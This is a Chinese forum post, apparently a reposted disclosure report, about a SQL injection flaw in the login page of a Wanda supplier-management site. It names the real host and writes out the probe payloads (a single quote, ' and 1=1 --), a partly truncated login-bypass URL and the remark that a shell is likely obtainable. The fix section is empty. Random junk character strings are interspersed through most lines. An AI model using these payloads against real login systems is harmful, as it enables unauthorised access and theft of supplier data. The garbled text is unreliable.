找回密码
 立即注册
查看: 3611|回复: 0
打印 上一主题 下一主题

万达供应商系统SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-24 20:16:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:万达某分站sql注入。敏感信息泄露。* |: Y  K, J1 N2 n. ]
详细说明:
" r' b9 |% S2 }" a6 H8 l, g万达scm系统登陆框sql注入。6 k% l" d) j; [% E; V7 [

$ \) h9 L! d: U  c/ Phttp://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
$ D; m0 I5 H5 ~3 R) L8 [# }
& a% q2 c* N+ v# x% r. F0 w1 h' Z' W' T. ^/ t2 T, M+ \
500错误。- f# [1 y' S$ J# r6 C

/ x6 c% e! m& L3 G' W, _* |用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
$ v" n, e2 N- e* |. s5 Whttp://www.myhack58.com/Article/UploadPic/2013-3/201332317223677547.png  ]- J6 M' M0 ~' a
截图有一点问题,用户名,和密码输入' and 1=1 --可以得到相同的提示,可自测。)5 T" r8 \6 q3 {3 ^
经过分析,登陆验证的过程应该是:
" Y6 e5 s4 S% Q2 T+ {/ E$ z/ R3 M
; N9 m% G+ M$ [& N取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。4 F" l3 A. l( I* d  _
http://www.myhack58.com/Article/UploadPic/2013-3/201332317233886589.png& @% x. i. S: G1 T

  F/ B2 \; e+ c- H5 s& Loracle数据库,存在注入点。@大连万达,你怎么看?
$ X3 y+ I! N6 Yhttp://www.myhack58.com/Article/UploadPic/2013-3/201332317241777393.png! Y3 e! H+ O+ R/ O

( `& Y8 f, C$ r* Q系统里有万达的供应商资料什么的,提交数据的地方随便输入',提交500错误。没深入。目测可shell。% t7 T( i, U4 u. K* I
漏洞证明:6 ]8 t! g( E; P' \) m; T6 E; M9 C
万达scm系统登陆框sql注入。
' \+ \3 D2 s+ E  x/ o# u; |6 X- v# k* E( q  P
http://www.vans-china.cn/LoginUser?USERNO=%27&PWD=%27
* v# k- k: T: M/ X: O; W
& J; W: I/ L( o$ C( g9 K6 j9 G) G* {! o$ S6 G4 a) o4 j4 x
500错误。
4 j6 a! Y/ h- w( s7 I
+ H& w$ F. g* [& R* R用户名随便输,提示没有该用户;USERNO=%27 and 1=1 --&PWD=%27 and 1=1 --提示密码错误。
4 Q6 z- F. J% t5 uhttp://www.myhack58.com/Article/UploadPic/2013-3/20133231728465694.png1 b/ S0 Y. P6 Q0 h) ^9 [
; z0 Z% B( m% A, M
/ A% z9 ]  b1 x
(截图有一点问题)
( P& Q2 |7 s: ?' ?$ K: g' k3 `- B) P- s- u7 h8 J+ l  @$ c% I- W% V
怎么饶都饶不过去;经过分析,登陆验证的过程应该是:0 n% A2 C. J. w' E( A0 m) b; h
  @5 t$ g! {- s9 @8 e0 X
取用户名查询数据库,有该用户,再用该用户密码和输入的密码进行比对,相同则登陆成功。
6 d: b9 z% }) i: w5 C2 Y# {8 V2 B
0 O! S6 z  s1 x7 R  L绕过:
9 Z. m6 `, y0 r. y( W7 `http://www.vans-china.cn/LoginUs ... 1%27=%271&PWD=1' h: x! f7 y" ?) a- u

2 g. D& M7 X! d$ e  l$ l; x! j5 K$ g- g. S" p/ ]( p
oracle数据库,存在注入点。@大连万达,你怎么看?
2 D* G% F5 ?% h# `+ q( D7 k+ g$ S​系统里有万达的供应商资料什么的,有发布公告,没深入。目测可shell。5 J; X6 A& M0 o, E

  E6 f0 ?0 N. G! m, q- J! {修复方案:
0 k- b. t$ f& l3 q. Z。。。
2 T; f, q9 [$ Z6 H$ w1 u
" A* U$ S* Y9 e  B5 \+ N. a
& M6 J2 V. ^9 H- s厂商已经确认# s& y8 G. h9 o* m1 T! r( o8 g
7 J: r! k7 Z3 C3 e
[/td][/tr]& i/ u8 o$ e. `% T$ F  ^! j
[/table]% v% c' O) O  a* ~4 A

9 [% \0 i" ~; u& I+ C/ X1 h6 |& [0 k6 `0 T+ G: ~$ m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表